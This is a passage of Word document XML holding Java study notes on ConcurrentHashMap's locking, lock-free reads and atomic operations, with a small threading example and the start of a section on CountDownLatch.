          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Write operations (like put() or remove()) on the same bucket are synchronized, but this does not block access to other buckets. The synchronization is only local to the affected bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0547C30B"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Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Read operations (like get()) are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lock-free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This means they do not require any synchronization, allowing multiple threads to read concurrently without contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D12270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Hashing Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7033ED"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ConcurrentHashMap uses the hash code of the key to determine which bucket it should be placed in, just like a HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6784D2A7"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older versions, each segment was made up of an array of buckets. In the current version,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the map are divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>smaller sub-segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be locked independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E248FFE"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ncurrency at the Segment Level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB4C2E2"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older versions of ConcurrentHashMap, the map was divided into segments (typically 16 segments). Each segment had its own lock, and threads could safely access and modify keys in different segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A56078"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Instead of segments,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their corresponding locks are designed to scale better, reducing contention further. When an entry is inserted or modified in the map, only the corresponding bucket is locked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372CBE9"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tomic Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26058E33"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a number of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for thread-safe updates and retrievals, which means you can safely perform operations like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D0B3A"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Adds a key-value pair only if the key is not already present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61147B99"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a key-value pair only if the key is mapped to the specified value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D67A04"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replace(K key, V oldValue, V newValue)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Replaces the value associated with the key only if it matches the old value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413D8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allow atomic updates and can be used in multi-threaded environments without the need for manual synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D1E6C"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No Locking on Reads (Lock-Free Reads):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D34F571"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 key advantages of ConcurrentHashMap is that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read operations are lock-free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8D295"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operations can be executed by multiple threads without needing to acquire a lock. This is achieved using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking algorithm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CAS (Compare and Swap)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which reduces the contention among threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5473727F"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operations typically outnumber </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations in most applications, lock-free reads significantly improve performance in highly concurrent environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC6034"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ing Hash Collisions (Internal Structure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C03A493"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keys have the same hash code, they will be placed in the same bucket. In a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the bucket is implement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free bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> depending on the size and number of collisions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CD74A4"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f the bucket contains multiple entries with the same hash code, it will typically us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structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F009E3A"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If there are many hash collisions (more than 8 entries in a bucket), the ConcurrentHashMap can switch from a linked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type of balanced tree) for faster lookups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C3116E"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xml:space="preserve">: In newer versions, the map also uses </w:t>
      </w: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meaning that operations on these buckets don’t require locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1780743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tructural Changes and Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F63D5D"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ConcurrentHashMap also supports some bulk operations, such as forEach(), reduce(), and search(), which operate atomically on the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B5DA1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Performance and Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B861B"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Since ConcurrentHashMap uses fine-grained locking and lock-free reads, it provides high concurrency and scales well with the number of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4A209"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 Writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Write operations (like put(), remove()) are thread-safe and have lower contention due to fine-grained locking mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7159003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6A531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50025ED0" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FC3A17"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384D46B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079FBE5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1654F45B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542F131C"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adds entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFD010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writerThread = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D139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5384EAC8"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 + i, i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2FE89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FA469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73CE81" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC5D9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reads entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633D494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readerThread = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4131B4F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2AF81EB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key" + i));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBFABDA"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307B59"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8E52B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="387C6250"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rt the threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D459AD"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start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8107A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aderThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50108324" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2483C95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ait for the threads to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF7FC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join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296583C1"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join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C5F33" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5D0A6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Size: " + map.size());  // Size after all operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7866152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7127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9B9B1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both read and write operations occur concurrently without locking the entire map, demonstrating the high concurrency capabilities of ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409AC9E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40945D"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Different buckets or segments can be locked independently, reducing contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0188676A"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Read operations are lock-free, enhancing performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F406C0"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Supports thread-safe atomic operations like putIfAbsent(), replace(), and remove().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B3EB42"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 It scales well in multi-threaded environments due to its efficient locking mechanism and lock-free reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AAD33" w14:textId="781ECC28" w:rsid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49" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8BBF85"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4" w:name="_Toc197867398"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain </w:t>
      </w:r>
      <w:r w:rsidRPr="004F2440">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>CountDownLatch?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="184"/>
    </w:p>
    <w:p w14:paraId="78D0F9BA" w14:textId="2DC0D7D3" w:rsidR="005112D9" w:rsidRPr="005112D9" w:rsidRDefault="005112D9" w:rsidP="005112D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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CountDownLatch is a synchronization aid in the </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package that allows one or more threads to </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> until a set of operations being performed by other threads completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04093E9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763AC292">
          <v:rect id="_x0000_i6737" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B327F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4007"/>
      </w:tblGrid>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="12273912" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0110BA9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haracteristic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79D2417C"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3D6F6C77" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05C532B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ackage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7936914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java.util.concurrent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="21E5E809" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76A0E2D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Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="152AB17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o synchronize one or more threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="19420CF7" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C036CA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Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A6BEBC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 mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="3EED0CFC" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15F80C0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usability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67F1B65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Not reusable once the count reaches zero</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005112D9" w:rsidRPr="005112D9" w14:paraId="3ECD920E" w14:textId="77777777" w:rsidTr="005112D9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2717F02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Initialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C658C8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quires an initial count (number of events)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F68E99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47475D0A">
          <v:rect id="_x0000_i6738" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D6432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2. How Does It Work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA642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A </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CountDownLatch</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is initialized with a </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49417FE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The </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>await()</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method makes the calling thread wait until the count reaches </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>zero</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D519F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Other threads call the </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>countDown()</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method to </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>decrement the count</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A52BA8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Once the count reaches zero, all waiting threads are </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>released</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CBA38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Useful when a thread needs to </w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wait for multiple tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="005112D9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294DC9B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17C9282B">
          <v:rect id="_x0000_i6739" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
